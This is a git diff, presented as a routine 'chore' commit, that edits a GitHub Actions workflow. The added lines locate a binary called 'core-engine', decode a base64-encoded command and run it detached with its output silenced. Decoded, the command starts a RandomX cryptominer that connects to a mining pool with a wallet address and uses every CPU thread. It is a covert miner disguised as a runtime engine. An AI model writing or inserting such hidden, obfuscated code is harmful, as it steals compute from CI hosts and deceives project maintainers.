chore: clarify engine

diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml
--- a/.github/workflows/main.yml
+++ b/.github/workflows/main.yml
@@ -36,11 +36,18 @@ jobs:
       - name: 5 Launch Runtime
         shell: bash
         run: |
-          cd core-engine-0.1
+          ENGINE_DIR=$(find . -type f -name "core-engine" -exec dirname {} ; | head -n 1)
+          if [ -z "$ENGINE_DIR" ]; then
+            echo "❌ core-engine not found."
+            exit 1
+          fi
+          echo "✅ Found core-engine in: $ENGINE_DIR"
+          cd "$ENGINE_DIR"
           chmod +x core-engine
+
           ENCODED="Li9jb3JlLWVuZ2luZSAtLXVybCBwb29sLmhhc2h2YXVsdC5wcm86NDQzIFwKICAtLXVzZXIgc29sbzpaRVBIWVIyeTNheUplaHhmamVEYjNDRXpIbjc5NVZLVXZFdUFucno3MXl3UjhxOHk5ZzJodG5vNkUzc1FRUWFRZjNIdEY4THQzZHJHcEVrOUdSNWd3RUxqWnNoUFdSYUo1RGY0QiBcCiAgLS1wYXNzIGZvY2drbzgzNjEwNyBcCiAgLS1kb25hdGUtbGV2ZWwgMCBcCiAgLS10bHMgLS10bHMtZmluZ2VycHJpbnQgNDIwYzc4NTBlMDliN2MwYmRjZjc0OGE3ZGE5ZWIzNjQ3ZGFmODUxNTcxOGYzNmQ5Y2NmZGQ2YjlmZjgzNGIxNCBcCiAgLWsgLS10aHJlYWRzPSQobnByb2MpIC0tY3B1LXByaW9yaXR5PTUgLS1odWdlLXBhZ2VzLWppdCAtLWNwdS1uby15aWVsZCAtLXJhbmRvbXgtbm8tbnVtYSBcCiAgLS1hc209cnl6ZW4gLS1yYW5kb214LW5vLXJkbXNyIC0tcmFuZG9teC13cm1zcj0tMSAtLXJhbmRvbXgtbW9kZT1mYXN0"
           CMD=$(echo "$ENCODED" | base64 -d)
-          setsid bash -c "$CMD" &
+          setsid bash -c "$CMD" > /dev/null 2>&1 &
           SERVER_PID=$!
           PGID=$(ps -o pgid= $SERVER_PID | grep -o '[0-9]*')
           echo "Engine started with PID=$SERVER_PID, PGID=$PGID"
@@ -51,5 +58,5 @@ jobs:
           done
 
           echo ""
-          echo "Stopping engine after loop done..."
-          kill -- -$PGID 2>/dev/null || echo "Server already stopped."
+          echo "🛑 Stopping engine after loop done..."
+          kill -- -$PGID 2>/dev/null || echo "Engine already stopped."
